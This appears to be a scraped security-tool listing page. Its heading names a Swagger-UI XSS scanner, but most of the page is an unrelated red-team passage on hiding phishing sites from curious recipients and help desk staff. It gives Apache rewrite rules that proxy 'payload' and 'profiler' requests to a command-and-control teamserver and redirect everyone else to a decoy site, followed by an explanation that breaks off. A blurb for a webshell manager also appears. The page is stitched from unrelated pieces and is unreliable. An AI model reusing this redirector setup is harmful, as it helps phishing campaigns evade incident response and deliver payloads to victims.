XSSwagger
A simple Swagger-ui scanner that detects old versions vulnerable to various XSS attacks
There have been times when a curious phish recipient or a zealous help desk staff has loaded the phishing link in their browser and decided to take a peek at a higher directory or the root domain. Of course, most times there isn’t much else site to see. In those cases, the chances of being reported to IR went up significantly, sometimes leading to a phishing campaign being blocked. This is where invalid URI redirection comes in handy. We can whitelist resources the Apache server will proxy for the targets and redirect any other requests to the target’s real domain or another page of our choosing. In the demo below, the user navigates to spoofdomain.com/really/long/url.html and is served a page; however, when the user navigates to spoofdomain.com/really/ the browser is redirected to google.com. RewriteEngine On RewriteCond %{REQUEST_URI} ^/(profiler|payload)/?$ [NC,OR] RewriteCond %{HTTP_REFERER} ^http://SPOOFED-DOMAIN.com [NC] RewriteRule ^.*$ http://TEAMSERVER-IP%{REQUEST_URI} [P] RewriteRule ^.*$ http://REDIRECTION-URL.com/? [L,R=302] Line by line explanation: Enable the rewrite engine If the request's URI is either '/profiler' or '/payload' (with an optional trailing slash), ignoring case; OR If the request's referer starts with 'http://SPOOFED-DOMAIN.com', ignoring case;
A simple Swagger-ui scanner that detects old versions vulnerable to various XSS attacks
AWS Web Application Firewall (WAF) for protecting web applications from common exploits.
A technology lookup and lead generation tool that identifies the technology stack of any website and provides features for market research, competitor analysis, and data enrichment.
A webshell manager via terminal for controlling web servers running PHP or MySQL.
A comprehensive web application security testing solution that offers built-in vulnerability assessment and management, as well as integration options with popular software development tools.
A CSP plugin for hapi with per-route configuration options.